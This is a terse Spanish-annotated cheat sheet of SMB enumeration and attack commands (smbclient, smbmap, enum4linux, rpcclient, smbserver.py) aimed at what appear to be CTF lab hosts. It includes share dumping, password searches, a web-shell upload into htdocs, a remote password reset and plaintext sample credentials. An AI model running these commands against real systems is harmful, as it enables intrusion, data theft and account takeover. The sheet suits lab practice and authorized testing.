# smbclient
smbclient -L \\iP -N
smbclient -L \\10.10.218.140 -U USER -m SMB2
smbclient \\\\10.10.218.140\\anonymous -N
smbclient -L //10.10.49.33/ --no-pass
smbclient '\\10.10.69.8\temporary share' -N -c ls # remote listing
smbclient '\\10.10.69.8\temporary share' -N -c 'prompt OFF;recurse ON;mget chapter* # recursive download
smbclient -L \\noc-samba-01.noc -N --option='client min protocol=NT1' 
smbclient \\\\10.129.112.148\\users -U 'bob' -c 'prompt OFF; get flag\flag.txt'

# smbmap
smbmap -H 10.10.218.140
smbmap -H 10.10.22.36 -u Bill -p Juw4nnaM4n420696969clear$$
smbmap.py -H iP -u ‘jsmith’ -p ‘Spring!2020’ -q -R –depth 2 –exclude ADMIN$ IPC$ #q=quiet, R=recursive
smbmap.py -H 192.168.86.20 -u ‘administrator’ -p ‘asdf1234’ -upload websell.php ‘htdocs\webshell.php’
smbmap.py -H IP -u administrator -p asdf1234 -F password #F:regular expresion a buscar

# enum4linux
enum4linux 10.10.20.192 -a
enum4linux -u Bill -p 'Juw4nnaM4n420696969!$$$' -a 10.10.22.36

# rpcclient
connection:
rpcclient -U 'Bill' 10.10.22.36
rpcclient -U "" -N IP
rpcclient -U 'user' -P 'pass' 10.21.7.123

groups:
enumdomgroups
querygroupmem 0x200 # rid

users:
enumdomusers
queryuser 0x3e8 # rid

domain info:
querydominfo
enumdomains

privs:
enumprivs

all shares:
netshareenumall

shares:
netshareenum

change password:
setuserinfo2 USUARIO 23 'PASSWORD'

lookup:
lookupnames Administrador
lookupsids S-1-5-21-3848638404-522410393-3157200768-501

# chequear si tenemos permisos de escritura en una montura samba
find . -type d | while read directorio; do
> touch ${directorio}/archivo 2>/dev/null && echo "puedo crear archivos en ${directorio}" && rm ${directorio}/archivo 
> mkdir ${directorio}/carpeta 2>/dev/null && echo "puedo crear carpetas en ${directorio}" && rm -f ${directorio}/carpeta
> done
	 
# compartir carpeta via cme
smbserver.py compartida $(pwd) -smb2support -user pgraffigna -password testing123 
